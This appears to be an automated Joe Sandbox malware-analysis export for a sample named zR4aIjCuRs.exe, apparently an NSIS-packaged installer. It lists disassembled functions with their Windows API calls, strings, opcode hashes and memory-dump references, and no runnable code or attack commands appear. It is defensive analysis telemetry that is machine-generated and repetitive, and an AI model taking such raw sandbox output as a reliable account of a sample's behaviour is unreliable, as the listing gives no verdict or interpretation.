Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: Dicyanodiamide Setup$F
API String ID: 941294808-4282637217
Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4

Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A

Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57

GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
wsprintfA.USER32 ref: 00405F85
GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
GlobalFree.KERNEL32(00000000), ref: 0040606E
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075

Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

Strings

[Rename], xrefs: 00405FEF, 00406001
%ls=%ls, xrefs: 00405F7B

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD

Function 0040654E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8

Strings

"C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 0040654E
*?|<>/":, xrefs: 004065A0
C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3626601527
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD

Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042B5
GetSysColor.USER32(00000000), ref: 004042F3
SetTextColor.GDI32(?,00000000), ref: 004042FF
SetBkMode.GDI32(?,?), ref: 0040430B
GetSysColor.USER32(?), ref: 0040431E
SetBkColor.GDI32(?,?), ref: 0040432E
DeleteObject.GDI32(?), ref: 00404348
CreateBrushIndirect.GDI32(?), ref: 00404352

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18

Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
GetMessagePos.USER32 ref: 00404C0F
ScreenToClient.USER32(?,?), ref: 00404C29
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61

Strings

f, xrefs: 00404C3D

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(000BD91A,00000064,000BD91E), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 8cfea930059ce5e69f8165424db4b58b8f2fb7459e8da0d31a2866ee00cce53b
Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
Opcode Fuzzy Hash: 8cfea930059ce5e69f8165424db4b58b8f2fb7459e8da0d31a2866ee00cce53b
Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98

Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
GetLastError.KERNEL32 ref: 00405848
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
GetLastError.KERNEL32 ref: 00405867

Strings

C:\Users\user\Desktop, xrefs: 004057F1

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 56aaffc7fd545305371b439287a03fd7ccaf004a29b63406c0e33255b185a1b6
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 90011A72D00619EADF00DFA1C944BEFBBB8EF14354F00843AE945B6281D7789618CFA9

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
